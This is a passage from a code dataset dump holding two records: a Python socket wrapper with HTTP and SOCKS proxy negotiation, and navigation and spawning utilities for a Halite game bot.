kwargs.items():\r\n setattr(self, 'so_'+k, v)\r\n \r\n def status(self):\r\n try:\r\n if self.so_socket.getsockopt(SOL_SOCKET, SO_ACCEPTCONN):\r\n return SockStatus.ACCEPTING\r\n except AttributeError:\r\n return SockStatus.CLOSED\r\n except error as err:\r\n if err.args[0]==errno.EBADF:\r\n return SockStatus.CLOSED\r\n else:\r\n return SockStatus.UNKNOWN\r\n sock, peer = self.addrs()\r\n if sock==peer==None:\r\n return SockStatus.CREATED\r\n if all((sock, peer)):\r\n return SockStatus.CONNECTED \r\n if peer==None:\r\n return SockStatus.BOUND\r\n return SockStatus.UNKNOWN\r\n \r\n def addrs(self):\r\n try:\r\n sockname = self.so_socket.getsockname()\r\n except:\r\n sockname = None\r\n \r\n if self.so_proxy_peer:\r\n peername = self.so_proxy_peer\r\n else:\r\n try:\r\n peername = self.so_socket.getpeername()\r\n except:\r\n peername = None\r\n return sockname, peername\r\n\r\n #===========================================================================\r\n # proxy handling interfaces\r\n #===========================================================================\r\n def _connect_with(self, method, address):\r\n if not self.so_proxy:\r\n method(address)\r\n else:\r\n if self.so_proxy.type.lower() == 'http':\r\n port = self.so_proxy.port or 8080\r\n elif self.so_proxy.type.lower in ['sock4', 'sock5']:\r\n port = self.so_proxy.port or 1080\r\n \r\n method((self.so_proxy.host, port))\r\n getattr(self, '_nego_'+self.so_proxy.type.lower())(self.so_proxy, address)\r\n self.setblocking(self.so_blocking)\r\n\r\n def _nego_http(self, proxy, address):\r\n template = \"CONNECT %s HTTP/1.1\\n\" \\\r\n \"Accept-Encoding: identity\\n\" \\\r\n \"Host: %s\\n\" \\\r\n \"Connection: close\\n\"\r\n \r\n authtemplate = \"SockProxy-Authorization: Basic %s\\n\"\r\n \r\n host, port = address\r\n if proxy.rdns:\r\n addr = host\r\n else:\r\n addr = gethostbyname(host)\r\n port = str(port)\r\n \r\n req = template %(addr + \":\" + port, host)\r\n if proxy.user and proxy.password:\r\n user_pass = '%s:%s' % (unquote(proxy.user), unquote(proxy.password))\r\n creds = b64encode(user_pass).strip()\r\n req += authtemplate %creds\r\n req += '\\n'\r\n \r\n self.sendall(req)\r\n # We read the response until we get the string \"\\r\\n\\r\\n\"\r\n resp = self.recv(1)\r\n while resp.find(\"\\r\\n\\r\\n\")==-1:\r\n resp = resp + self.recv(1)\r\n # We just need the first line to check if the connection\r\n # was successful\r\n statusline = resp.splitlines()[0].split(\" \",2)\r\n if statusline[0] not in (\"HTTP/1.0\",\"HTTP/1.1\"):\r\n self.so_socket.close()\r\n raise ProxyError('no respone from proxy server')\r\n try:\r\n statuscode = int(statusline[1])\r\n except ValueError:\r\n self.so_socket.close()\r\n raise ProxyError('invalid response from proxy server')\r\n \r\n if statuscode != 200:\r\n self.so_socket.close()\r\n raise ProxyError('cannot connect to target [http proxy status code %s]' %str(statuscode))\r\n \r\n self.so_proxy_peer = address\r\n self.so_proxy_sock = (\"0.0.0.0\",0)\r\n\r\n def _nego_socks5(self, proxy, address):\r\n def recv(length):\r\n data = \"\"\r\n while len(data) < length:\r\n data = data + self.recv(length-len(data))\r\n return data\r\n \r\n # First we'll send the authentication packages we support.\r\n if proxy.user and proxy.password:\r\n # The username/password details were supplied to the\r\n # setproxy method so we support the USERNAME/PASSWORD\r\n # authentication (in addition to the standard none).\r\n self.sendall(\"\\x05\\x02\\x00\\x02\")\r\n else:\r\n # No username/password were entered, therefore we\r\n # only support connections with no authentication.\r\n self.sendall(\"\\x05\\x01\\x00\")\r\n # We'll receive the server's response to determine which\r\n # method was selected\r\n chosenauth = recv(2)\r\n if chosenauth[0] != \"\\x05\":\r\n self.close()\r\n raise ProxyError('socks5 proxy is not supported by server')\r\n # Check the chosen authentication method\r\n if chosenauth[1] == \"\\x00\":\r\n # No authentication is required\r\n pass\r\n elif chosenauth[1] == \"\\x02\":\r\n # Okay, we need to perform a basic username/password\r\n # authentication.\r\n self.sendall(\"\\x01\" + chr(len(proxy.user)) + proxy.user + chr(len(proxy.password)) + proxy.password)\r\n authstat = recv(2)\r\n if authstat[0] != \"\\x01\":\r\n # Bad response\r\n self.close()\r\n raise ProxyError('bad authentication request')\r\n if authstat[1] != \"\\x00\":\r\n # Authentication failed\r\n self.close()\r\n raise ProxyError('Authentication failed')\r\n # Authentication succeeded\r\n else:\r\n # Reaching here is always bad\r\n self.close()\r\n if chosenauth[1] == \"\\xFF\":\r\n raise ProxyError('connection not allowed by ruleset')\r\n else:\r\n raise ProxyError('invalid data from socks5 proxy server')\r\n # Now we can request the actual connection\r\n req = \"\\x05\\x01\\x00\"\r\n # If the given destination address is an IP address, we'll\r\n # use the IPv4 address request even if remote resolving was specified.\r\n \r\n try:\r\n ipaddr = inet_aton(address[0])\r\n req = req + \"\\x01\" + ipaddr\r\n except socket.error:\r\n # Well it's not an IP number, so it's probably a DNS name.\r\n if proxy.rdns:\r\n # Resolve remotely\r\n ipaddr = None\r\n req = req + \"\\x03\" + chr(len(address[0])) + address[0]\r\n else:\r\n # Resolve locally\r\n ipaddr = inet_aton(socket.gethostbyname(address[0]))\r\n req = req + \"\\x01\" + ipaddr\r\n req = req + struct.pack(\">H\", address[1])\r\n self.sendall(req)\r\n # Get the response\r\n resp = recv(4)\r\n if resp[0] != \"\\x05\":\r\n self.close()\r\n raise ProxyError('socks5 proxy is not supported by server')\r\n elif resp[1] != \"\\x00\":\r\n # Connection failed\r\n self.close()\r\n if ord(resp[1])<=8:\r\n raise ProxyError('socks5 proxy error: %d' %ord(resp[1]))\r\n else:\r\n raise ProxyError('socks5 proxy error: unknown')\r\n # Get the bound address/port\r\n elif resp[3] == \"\\x01\":\r\n boundaddr = recv(4) #IPv4 address\r\n elif resp[3] == \"\\x03\":\r\n resp = resp + recv(1)\r\n boundaddr = recv(ord(resp[4])) #Domain name\r\n elif resp[3] == \"\\x04\":\r\n boundaddr = recv(16) #IPv6 address\r\n else:\r\n self.close()\r\n raise ProxyError('invlid data from socks5 proxy server')\r\n boundport = struct.unpack(\">H\",recv(2))[0]\r\n self.so_proxy_sock = (boundaddr, boundport)\r\n if ipaddr != None:\r\n self.so_peer = (inet_ntoa(ipaddr), address[1])\r\n else:\r\n self.so_peer = address\r\n\r\n def _nego_socks4(self, proxy, address):\r\n def recv(length):\r\n data = \"\"\r\n while len(data) < length:\r\n data = data + self.recv(length-len(data))\r\n return data\r\n \r\n # Check if the destination address provided is an IP address\r\n rmtrslv = False\r\n try:\r\n ipaddr = socket.inet_aton(address[0])\r\n except socket.error:\r\n # It's a DNS name. Check where it should be resolved.\r\n if proxy.rdns:\r\n ipaddr = \"\\x00\\x00\\x00\\x01\"\r\n rmtrslv = True\r\n else:\r\n ipaddr = inet_aton(socket.gethostbyname(address[0]))\r\n # Construct the request packet\r\n req = \"\\x04\\x01\" + struct.pack(\">H\", address[1]) + ipaddr\r\n # The username parameter is considered userid for SOCKS4\r\n if proxy.user != None:\r\n req = req + proxy.user\r\n req = req + \"\\x00\"\r\n # DNS name if remote resolving is required\r\n # NOTE: This is actually an extension to the SOCKS4 protocol\r\n # called SOCKS4A and may not be supported in all cases.\r\n if rmtrslv==True:\r\n req = req + address[0] + \"\\x00\"\r\n self.sendall(req)\r\n # Get the response from the server\r\n resp = recv(8)\r\n if resp[0] != \"\\x00\":\r\n # Bad data\r\n self.close()\r\n raise ProxyError('invlid data from socks4 proxy server')\r\n if resp[1] != \"\\x5A\":\r\n # Server returned an error\r\n self.close()\r\n if ord(resp[1]) in ('0x5b', '0x5c', '0x5d'):\r\n self.close()\r\n raise ProxyError('socks4 proxy error: %d' %ord(resp[1]))\r\n else:\r\n raise ProxyError('socks4 proxy error: unknown')\r\n # Get the bound address/port\r\n self.so_proxy_sock = (inet_ntoa(resp[4:]),struct.unpack(\">H\",resp[2:4])[0])\r\n if rmtrslv != None:\r\n self.so_proxy_peer = (inet_ntoa(ipaddr),address[1])\r\n else:\r\n self.so_proxy_peer = address\r\n\r\n ## socket interface\r\n def __init__(self, family=2, type=1, proto=0, **kwargs): #@ReservedAssignment\r\n self.config(family=family, type=type, proto=proto)\r\n self.config(**kwargs)\r\n \r\n def connect(self, address):\r\n self._connect_with(self.so_socket.connect, address)\r\n\r\n def connect_ex(self, address):\r\n self._connect_with(self.so_socket.connect_ex, address)\r\n \r\n def setblocking(self, blocking) :\r\n self.so_blocking = blocking\r\n return self.so_socket.setblocking(blocking)\r\n \r\n def getblocking(self):\r\n return self.so_blocking\r\n \r\n def settimeout(self, timeout) :\r\n self.so_timeout = timeout\r\n return self.so_socket.settimeout(timeout)\r\n \r\n def getpeername(self) :\r\n return self.so_socket.getpeername()\r\n \r\n def getsockname(self) :\r\n return self.so_socket.getsockname()\r\n \r\n def gettimeout(self) :\r\n return self.so_socket.gettimeout()\r\n \r\n def accept(self) :\r\n return self.so_socket.accept()\r\n\r\n def bind(self, *args) :\r\n return self.so_socket.bind(*args)\r\n \r\n def close(self) :\r\n self.so_proxy_sock = None\r\n self.so_proxy_peer = None\r\n try:\r\n self.so_socket.close()\r\n except:\r\n pass\r\n \r\n def fileno(self) :\r\n return self.so_socket.fileno()\r\n\r\n def getsockopt(self, *args) :\r\n return self.so_socket.getsockopt(*args)\r\n \r\n def listen(self, *args) :\r\n return self.so_socket.listen(*args)\r\n \r\n def makefile(self, *args) :\r\n return self.so_socket.makefile(*args)\r\n \r\n def recv(self, *args) :\r\n return self.so_socket.recv(*args)\r\n \r\n def recvfrom(self, *args) :\r\n return self.so_socket.recvfrom(*args)\r\n\r\n def recvfrom_into(self, *args) :\r\n return self.so_socket.recvfrom_into(*args)\r\n \r\n def recv_into(self, *args) :\r\n return self.so_socket.recv_into(buffer, *args)\r\n \r\n def send(self, *args) :\r\n return self.so_socket.send(*args)\r\n \r\n def sendall(self, *args) :\r\n return self.so_socket.sendall(*args)\r\n \r\n def sendto(self, *args) :\r\n return self.so_socket.sendto(*args)\r\n \r\n def setsockopt(self, *args):\r\n return self.so_socket.setsockopt(*args)\r\n \r\n def shutdown(self, *args):\r\n return self.so_socket.shutdown(*args)\r\n","sub_path":"xyproj/src/xy/core/sock.py","file_name":"sock.py","file_ext":"py","file_size_in_byte":15378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"366617412","text":"#\n# Mybot code\n#\n\n# This library contains constant values.\nfrom hlt import constants\n\n# This library contains direction metadata to better interface with the game.\nfrom hlt.positionals import Position\nfrom hlt.positionals import Direction\n\nfrom hlt.entity import Shipyard\n\nimport os\nimport time\nimport math\nimport random\nimport logging\nimport numpy as np\n\n# mybot utils\nfrom myutils.constants import *\nfrom myutils.cell_block import *\n\ndef get_mining_rate(game, turns = None, ship_id = None):\n '''\n Returns the mining rate for the game or a specific ship. Always returns\n a rate of at least 1.\n '''\n\n if len(game.game_metrics[\"mined\"]) == 0:\n return 1\n\n if turns is None:\n turns = game.turn_number\n\n oldest_turn = 1 if game.turn_number < turns else (game.turn_number - turns)\n i = len(game.game_metrics[\"mined\"]) - 1\n\n mined = []\n mined_by_ship = {}\n\n # turn, ship.id, mined\n while i >= 0 and game.game_metrics[\"mined\"][i][0] > oldest_turn:\n s_id = game.game_metrics[\"mined\"][i][1]\n halite = game.game_metrics[\"mined\"][i][2]\n mined_by_ship[s_id] = mined_by_ship[s_id] + halite if s_id in mined_by_ship else halite\n i -= 1\n\n if ship_id is None:\n for s_id, halite in mined_by_ship.items():\n mined.append(halite / (game.turn_number - game.ship_christenings[s_id] - 1))\n\n rate = np.average(mined)\n else:\n rate = mined_by_ship.items[ship_id] / (game.turn_number - game.ship_christenings[ship_id] - 1)\n\n return rate\n\n#\n#\n#\ndef ships_are_spawnable(game):\n me = game.me\n shipyard = game.game_map[me.shipyard]\n\n # % turns above mining rate to dropoff the halite, will typically be about 2?\n mining_over_head = 2\n ship_count = len(me.get_ships())\n\n #\n # absolute constraints (order can be important)\n #\n\n if ship_count >= MAX_SHIPS:\n if DEBUG & (DEBUG_GAME): logging.info(\"GAME - Spawn denied. MAX ships reached\".format())\n return False\n\n if me.halite_amount < constants.SHIP_COST:\n if DEBUG & (DEBUG_GAME): logging.info(\"GAME - Spawn denied. Insufficient halite\".format())\n return False\n\n #\n # conditional constraints\n #\n\n # spawn 4 right away\n if EXPEDITED_DEPARTURE:\n if me.ship_count < EXPEDITED_SHIP_COUNT:\n if DEBUG & (DEBUG_GAME): logging.info(\"GAME - Spawn expedited due to ship count {} < {}\".format(me.ship_count, EXPEDITED_SHIP_COUNT))\n return True\n\n # watch for collisions with owner only, note this will be 1 turn behind\n occupied_cells = []\n if shipyard.is_occupied and shipyard.ship.owner == me.id:\n occupied_cells.append(shipyard.position)\n\n # entry lane are N/S #shipyard.position.get_surrounding_cardinals():\n for pos in [shipyard.position.directional_offset(Direction.North), shipyard.position.directional_offset(Direction.North)]:\n if game.game_map[pos].is_occupied:\n occupied_cells.append(pos)\n\n # need to keep track of ships docking instead, a ship in an adjacent cell could be leaving\n if len(occupied_cells) > 0:\n if DEBUG & (DEBUG_GAME): logging.info(\"GAME - Spawn denied. Occupied cells: {}\".format(occupied_cells))\n return False\n\n # primary constraint\n #\n # New code\n #\n #payback_turns = constants.SHIP_COST / get_mining_rate(game, MINING_RATE_LOOKBACK)\n #remaining_turns = constants.MAX_TURNS - game.turn_number\n #if payback_turns * mining_over_head < remaining_turns:\n\t#\t if DEBUG & (DEBUG_GAME): logging.info(\"Spawn retval: {}\".format(retval))\n # return False\n #\n #return True\n\n ###\n ### v6 old code\n ###\n if me.ship_count > 0:\n payback_turns = constants.SHIP_COST / get_mining_rate(game, MINING_RATE_LOOKBACK)\n remaining_turns = constants.MAX_TURNS - game.turn_number\n\n retval = round(payback_turns * mining_over_head) < remaining_turns\n if DEBUG & (DEBUG_GAME): logging.info(\"Spawn retval: {}\".format(retval))\n\n return retval\n else:\n return True\n\n#\n#\n#\ndef get_max_loiter_distance(game):\n max_loiter_dist_x = min(game.me.shipyard.position.x, (game.game_map.width - game.me.shipyard.position.x))\n max_loiter_dist_y = min(game.me.shipyard.position.y, (game.game_map.height - game.me.shipyard.position.y))\n max_loiter_distance = min(max_loiter_dist_x, max_loiter_dist_y, MAX_LOITER)\n\n return float(max_loiter_distance)\n\n#\n#\n#\ndef get_min_loiter_distance(game):\n # when a ship is sent off from the shipyard, this is the max distance. It set\n # dynamically. The min loiter distance is stored as an offset, see min_loiter_distance\n return float(MIN_LOITER)\n\n#\n#\n#\ndef get_loiter_multiple(game):\n\n # when a ship is sent off from the shipyard, this is the max distance it navigates\n # before 'exploring'\n min_loiter_distance = get_min_loiter_distance(game)\n\n #\n # stdist\n #\n # scipy lib is installed on server env by default\n #from scipy.stats import norm\n #\n # 0.3989422804014327 @ loc=0, scale=1.0\n # smaller number reduces tail flatness\n #inputWidth = 5.0\n #maxNorm = norm.pdf(0, loc=0, scale=1.0)\n #loiterMult = norm.pdf(inputWidth/2.0 - ((game.turn_number - 1)/constants.MAX_TURNS) * inputWidth, loc=0, scale=1.0)/maxNorm * maxLoiterDist\n\n #\n # atan\n #\n # inputOffset values shift curve left so we get into the steep part earlier\n #inputOffset = 75\n #\n # std value is pi? large inputWidth values result in 'more tail', small value move toward a strait line\n #inputWidth = math.pi * 2.0\n #\n #maxArcTan = math.atan(inputWidth - inputWidth/2) + math.atan(inputWidth/2)\n #loiterMult = math.atan(((game.turn_number - 1.0 + inputOffset)/constants.MAX_TURNS) * inputWidth - (inputWidth/2.0)) + math.atan(inputWidth/2.0)\n #loiterMult = loiterMult / maxArcTan * get_max_loiter_distance(game)\n\n #\n # linear\n #\n #loiterMult = (float(game.turn_number - 1) / float(constants.MAX_TURNS)) * get_max_loiter_distance(game)\n\n # based on area\n loiterMult = math.sqrt(game.turn_number - 1.0) / math.sqrt(constants.MAX_TURNS) * get_max_loiter_distance(game)\n\n # make sure we don't a useless mult\n if loiterMult < min_loiter_distance:\n loiterMult = min_loiter_distance\n\n return loiterMult\n\n#\n# type: 'random', 'density'\n# collision_resolution: 'random', 'density', 'navigate'\n#\ndef get_move(game, ship, type=\"random\", collision_resolution=\"random\"):\n if type == \"random\":\n move = get_random_move(game, ship)\n elif type == \"density\":\n move = get_density_move(game, ship)\n else:\n raise RuntimeError(\"Unknown move type: \" + str(type))\n\n return move\n\n#\n# returns a dict indexed on 'n', 's', 'e', 'w' of 3x3 lists of cells\n#\ndef get_surrounding_cell_blocks(game, ship, w, h):\n t = CellBlock.get_corner_offset(\"n\", w, h)\n north_corner = Position(ship.position.x + t[0], ship.position.y + t[0])\n\n t = CellBlock.get_corner_offset(\"s\", w, h)\n south_corner = Position(ship.position.x + t[0], ship.position.y + t[0])\n\n t = CellBlock.get_corner_offset(\"e\", w, h)\n east_corner = Position(ship.position.x + t[0], ship.position.y + t[0])\n\n t = CellBlock.get_corner_offset(\"w\", w, h)\n west_corner = Position(ship.position.x + t[0], ship.position.y + t[0])\n\n return [\n (Direction.North, CellBlock(game, north_corner, w, h)),\n (Direction.South, CellBlock(game, south_corner, w, h)),\n (Direction.East, CellBlock(game, east_corner, w, h)),\n (Direction.West, CellBlock(game, west_corner, w, h))\n ]\n\n#\n# nav moves resolv first by density, then randomly\n#\ndef get_density_move(game, ship):\n\n move = \"o\"\n\n if DEBUG & (DEBUG_NAV): logging.info(\"Nav - ship {} is getting a density based move\".format(ship.id))\n\n if not check_fuel_cost(game, ship):\n return move\n\n moves = []\n for quadrant in get_surrounding_cell_blocks(game, ship, 3, 3):\n directional_offset = quadrant[0]\n block = quadrant[1]\n\n if block.get_max() > constants.MAX_HALITE * MINING_THRESHOLD_MULT:\n moves.append((directional_offset, block, block.get_mean()))\n\n sorted_blocks = sorted(moves, key=lambda item: item[2], reverse=True)\n\n if len(sorted_blocks) == 0:\n return get_random_move(game, ship) # FIX ME FIX ME FIX ME FIX ME FIX ME FIX ME would be better to try a large search radius ???\n\n best_bloc_data = sorted_blocks[0]\n\n max_cell = best_bloc_data[1].get_max()\n\n bc = best_bloc_data[1].get_cells()\n\n for best_cell in bc:\n if best_cell.halite_amount == max_cell:\n break\n\n move_offset = best_bloc_data[0]\n if DEBUG & (DEBUG_NAV): logging.info(\"Nav - Ship {} moveOffset: {}\".format(ship.id, move_offset))\n\n new_position = game.game_map.normalize(ship.position.directional_offset(move_offset))\n if DEBUG & (DEBUG_NAV): logging.info(\"Nav - Ship {} new_position: {}\".format(ship.id, new_position))\n\n normalized_position = game.game_map.normalize(new_position)\n if DEBUG & (DEBUG_NAV): logging.info(\"Nav - Ship {} normalized_position: {}\".format(ship.id, normalized_position))\n\n cell = game.game_map[normalized_position]\n\n if not cell.is_occupied:\n move = Direction.convert(move_offset)\n cell.mark_unsafe(ship)\n game.game_map[ship.position].mark_safe()\n\n # if we were not able to find a usable dense cell, try to find a random one\n if move == \"o\":\n if DEBUG & (DEBUG_NAV): logging.info(\"Nav - Ship {} Collision, trying to find a random move\".format(ship.id))\n lateral_offsets = Direction.laterals(move_offset)\n lateral_moves = list(map(lambda direction_offset: Direction.convert(direction_offset), lateral_offsets))\n move = get_random_move(game, ship, lateral_moves)\n\n if move == \"o\":\n if DEBUG & (DEBUG_NAV): logging.info(\"Nav - Ship {} Collision, unable to find a move\".format(ship.id))\n\n move_plus_one = Position(best_cell.position.x, best_cell.position.y) # go one more move in the same direction\n if DEBUG & (DEBUG_NAV): logging.info(\"Nav - Ship {} has a move_plus_one of {}\".format(ship.id, move_plus_one))\n ship.path.append(move_plus_one)\n\n return move\n\n#\n# nav moves resolv randomly\n#\ndef get_random_move(game, ship, moves = [\"n\", \"s\", \"e\", \"w\"]):\n\n move = \"o\"\n\n if DEBUG & (DEBUG_NAV): logging.info(\"NAV - ship {} getting random move\".format(ship.id))\n\n if not check_fuel_cost(game, ship):\n return move\n\n moveIdx = random.randint(0, 3)\n\n for idx in range(moveIdx, moveIdx + 4):\n moveChoice = moves[idx % len(moves)]\n if DEBUG & (DEBUG_NAV): logging.info(\"NAV - Ship {} moveChoice: {} {}\".format(ship.id, idx, moveChoice))\n\n new_position = ship.position.directional_offset(DIRECTIONS[moveChoice])\n if DEBUG & (DEBUG_NAV): logging.info(\"NAV - Ship {} new_position: {}\".format(ship.id, new_position))\n\n normalized_position = game.game_map.normalize(new_position)\n if DEBUG & (DEBUG_NAV): logging.info(\"NAV - Ship {} normalized_position {}\".format(ship.id, normalized_position))\n\n cell = game.game_map[normalized_position]\n\n if not cell.is_occupied:\n cell.mark_unsafe(ship)\n game.game_map[ship.position].mark_safe()\n move = moveChoice\n break\n\n return move\n\n#\n# destination - The direction the ship is trying to go. Backoff will be opposite\n#\ndef get_backoff_point(game, ship, destination):\n destinationMoves = game.game_map.get_unsafe_moves(ship.position, destination)\n\n if len(destinationMoves) == 0:\n return ship.position\n\n choice = random.choice(destinationMoves)\n backoffDirection = Direction.invert(choice)\n\n # when there's a collion, we backoff between 1 and nShips/2 cells\n mult = random.randint(1, max(1, round(len(game.me.get_ships()) / 2)))\n\n backoffPoint = ship.position + Position(backoffDirection[0] * mult, backoffDirection[1] * mult)\n\n # if the backup point wrap, truncate it to the edge to prevent simple nav from failing\n if backoffPoint.x > game.game_map.width - 1:\n backoffPoint.x = game.game_map.width - 1\n\n if backoffPoint.x < 0:\n backoffPoint.x = 0\n\n if backoffPoint.y > game.game_map.height - 1:\n backoffPoint.y = game.game_map.height - 1\n\n if backoffPoint.y < 0:\n backoffPoint.y = 0\n\n if DEBUG & (DEBUG_NAV): logging.info(\"Nav.get_backoff_point() - ship {} has backoffPoint {}\".format(ship.id, backoffPoint))\n\n return backoffPoint\n\n#\n#\n#\ndef get_dropoff_position(game, ship):\n dropoffs = game.me.get_dropoffs()\n destinations = list(dropoffs) + [game.me.shipyard.position]\n\n minDistance = False\n movePosition = False\n\n for dest in destinations:\n distance = game.game_map.calculate_distance(ship.position, dest)\n if minDistance == False or distance < minDistance:\n minDistance = distance\n movePosition = dest\n\n return movePosition\n\n#\n# nav moves resolv randomly\n#\n# waypoint_algorithm: if a point is not continous, then calc path using waypoint_algorithm\n#\ndef get_nav_move(game, ship, waypoint_algorithm = \"astar\", args = {\"move_cost\": \"turns\"}):\n game_map = game.game_map\n\n if DEBUG & (DEBUG_NAV): logging.info(\"NAV - ship {} getting nav move for path {}\".format(ship.id, ship.path))\n\n if not check_fuel_cost(game, ship):\n return 'o'\n\n if len(ship.path) == 0:\n if DEBUG & (DEBUG_NAV): logging.info(\"NAV - ship {} empty path\".format(ship.id))\n return 'o'\n\n next_position = ship.path[len(ship.path) - 1]\n\n # check to see if we have a waypoint, not a continous path\n if game_map.calculate_distance(ship.position, next_position) > 1:\n normalized_next_position = game_map.normalize(next_position)\n\n if DEBUG & (DEBUG_NAV): logging.info(\"NAV - ship {} found waypoint {}, calulating complete path\".format(ship.id, next_position))\n\n # calc a continous path\n path, cost = game_map.navigate(ship.position, normalized_next_position, waypoint_algorithm, args)\n\n if path is None or len(path) == 0:\n if DEBUG & (DEBUG_NAV): logging.info(\"NAV - ship {} Nav failed, can't reach {} from {}\".format(ship.id, normalized_next_position, ship.position))\n return 'o'\n else:\n if DEBUG & (DEBUG_NAV): logging.info(\"NAV - ship {} path to waypoint {} found with a cost of {} ({} turns)\".format(ship.id, next_position, next_position, round(cost), len(path)))\n ship.path.pop()\n ship.path = ship.path + path\n\n new_position = ship.path[len(ship.path) - 1]\n if DEBUG & (DEBUG_NAV): logging.info(\"NAV - ship {} new_position: {}\".format(ship.id, new_position))\n\n normalized_new_position = game_map.normalize(new_position)\n if DEBUG & (DEBUG_NAV): logging.info(\"NAV - ship {} normalized_new_position: {}\".format(ship.id, normalized_new_position))\n\n # why?\n if normalized_new_position == ship.position:\n if DEBUG & (DEBUG_NAV): logging.warn(\"NAV - ship {} popped move {}. Why?\".format(ship.id, ship.path[-1]))\n ship.path.pop()\n return 'o'\n\n cell = game_map[normalized_new_position]\n\n # use get_unsafe_moves() to get a normalized directional offset. We should always get one soln.\n offset = game_map.get_unsafe_moves(ship.position, normalized_new_position)[0]\n move = Direction.convert(offset)\n\n if DEBUG & (DEBUG_NAV): logging.info(\"NAV - Ship {} has potential move: {}\".format(ship.id, move))\n\n # once we have the move, handle collisions\n if cell.is_occupied:\n if DEBUG & (DEBUG_NAV): logging.info(\"Nav - Ship {} has a collision at {} while moving {}\".format(ship.id, normalized_new_position, move))\n # don't let enemy ships block the dropoff\n if cell.structure_type is Shipyard and cell.ship.owner != game.me.id:\n cell.mark_unsafe(ship)\n game.game_map[ship.position].mark_safe()\n ship.path.pop()\n # when arriving at a droppoff, wait from entry rather than making a random\n # this probably will not work as well if not using entry/exit lanes\n elif game_map.calculate_distance(normalized_new_position, game.me.shipyard.position) <=1:\n move = \"o\"\n # when departing a shipyard, try not to head the wrong direction\n elif ship.position == game.me.shipyard.position:\n alternate_moves = Direction.laterals(move)\n move = \"o\"\n for alternate_move_offset in alternate_moves:\n alternate_pos = ship.position.directional_offset(alternate_move_offset)\n alternate_cell = game_map[alternate_pos]\n if not alternate_cell.is_occupied:\n alternate_cell.mark_unsafe(ship)\n game.game_map[ship.position].mark_safe()\n move = Direction.convert(alternate_move_offset)\n else:\n move = get_random_move(game, ship)\n if move == \"o\":\n if DEBUG & (DEBUG_NAV): logging.info(\"NAV - ship {} collision at {} with ship {}, using {}\".format(ship.id, normalized_new_position, cell.ship.id , move))\n else:\n cell.mark_unsafe(ship)\n game.game_map[ship.position].mark_safe()\n if DEBUG & (DEBUG_NAV): logging.info(\"NAV - ship {} popped path {}\".format(ship.id, ship.path[-1]))\n ship.path.pop()\n\n return move\n\n#\n# Returns True if ship has enough fuel to move\n#\ndef check_fuel_cost(game, ship):\n fuelCost = game.game_map[ship.position].halite_amount * .1\n\n if round(fuelCost) > ship.halite_amount:\n if DEBUG & (DEBUG_NAV): logging.info(\"NAV - Ship {} has insuffient fuel. Have {}, need {}\".format(ship.id, ship.halite_amount, round(fuelCost, 2)))\n return False\n\n return True\n\n#\n#\n#\ndef dump_stats(game, data, key = \"all\"):\n if key == \"all\":\n keys = data.keys()\n else:\n keys = [key]\n\n ts = time.strftime(\"%Y%m%d-%s\", time.gmtime())\n\n if os.path.exists(STATS_DIR):\n stats_dir = STATS_DIR\n else:\n stats_dir = \".\"\n\n for k in keys:\n with open(stats_dir + '/' + k + \"-\" + ts + \"-bot-\" + str(game.me.id) + \".log\", \"w\") as f:\n for line in data[k]:\n f.write(str(line) + \"\\n\")\n\ndef dump_data_file(game, data, file_basename):\n \"\"\"\n Dump random data for debugging/analysis\n\n file_basename - no extension\n data - numpy array\n \"\"\"\n\n ts = time.strftime(\"%Y%m%d-%s\", time.gmtime())\n\n if os.path.exists(STATS_DIR):\n stats_dir = STATS_DIR\n else:\n stats_dir = \".\"\n\n np.set_printoptions(precision=1, linewidth=240, suppress=True, threshold=np.inf)\n\n data_str = np.array2string(data.astype(np.int64), separator=\",\")\n\n with open(stats_dir + '/' + file_basename + \"-\" + ts + \"-bot-\" + str(game.me.id) + \".log\", \"w\") as f:\n f.write(data_str)\n\ndef should_move(game, ship):\n cell_halite = game.game_map[ship.position].halite_amount\n\n if ship.is_full:\n return True\n\n if cell_halite < constants.MAX_HALITE * MINING_THRESHOLD_MULT:\n return True\n\n# cargo_threshold = .95 * constants.MAX_HALITE\n# logging.debug(\"DEBUG cargo {} > cargo threshold {} === {}\".format(ship.halite_amount, cargo_threshold, ship.halite_amount > cargo_threshold))\n# if ship.halite_amount > cargo_threshold and ship.status == \"returning\":\n# return True\n\n# remaining_cargo_capacity = constants.MAX_HALITE - ship.halite_amount\n# mining_yield = cell_halite * .25\n# logging.debug(\"DEBUG {} >= {} === {}\".format(mining_yield, remaining_cargo_capacity, mining_yield < remaining_cargo_capacity))\n# if mining_yield < remaining_cargo_capacity and ship.status == \"returning\":\n# return True\n\n return False\n\ndef get_loiter_point(game, ship, hint = None):\n \"\"\"\n After a ship complets a dropoff, assign it a new destination whose distance is\n based on game number and direction is random\n\n 1. get the loiter distance (multiplier)\n 2. get a random point on a circle an mult by the loiter multiple\n 3. extend the circle x,y by the loiter distance to create an offset\n 4. Add the offset to the current position to get the loiter point\n 5. Calc a nav path to the loiter point\n \"\"\"\n loiter_distance = get_loiter_multiple(game)\n\n if DEBUG & (DEBUG_NAV): logging.info(\"NAV - Ship {} loiter_distance: {}\".format(ship.id, loiter_distance))\n if DEBUG & (DEBUG_NAV_METRICS): game.game_metrics[\"loiter_multiples\"].append((game.turn_number, round(loiter_distance, 2)))\n\n # get a random point on a cicle in radians, note that +y is down\n if hint is None:\n pt = random.uniform(0, math.pi * 2)\n elif hint == \"n\":\n pt = random.uniform(7*math.pi/4, 5*math.pi/4)\n elif hint == \"s\":\n pt = random.uniform(3*math.pi/4, math.pi/4)\n elif hint == \"e\":\n pt = random.choice([random.uniform(7*math.pi/4, 2*math.pi), random.uniform(0, math.pi/4)])\n elif hint == \"w\":\n pt = random.uniform(5*math.pi/4, 3*math.pi/4)\n else:\n raise\n\n raw_loiter_point = (math.cos(pt), math.sin(pt))\n\n if DEBUG & (DEBUG_NAV): logging.info(\"NAV - Ship {} raw_loiter_point: ({},{}), loiter_distance: {}, hint: {}\".format(ship.id, round(raw_loiter_point[0], 4), round(raw_loiter_point[1], 4), loiter_distance, hint))\n\n loiterOffset = Position(round(raw_loiter_point[0] * loiter_distance), round(raw_loiter_point[1] * loiter_distance))\n\n if DEBUG & (DEBUG_NAV_METRICS): game.game_metrics[\"raw_loiter_points\"].append(raw_loiter_point)\n if DEBUG & (DEBUG_NAV_METRICS): game.game_metrics[\"loiter_offsets\"].append((loiterOffset.x, loiterOffset.y))\n\n return ship.position + loiterOffset\n\n\ndef get_departure_point(game, dropoff, destination, departure_lanes = \"e-w\"):\n distance = abs(destination - 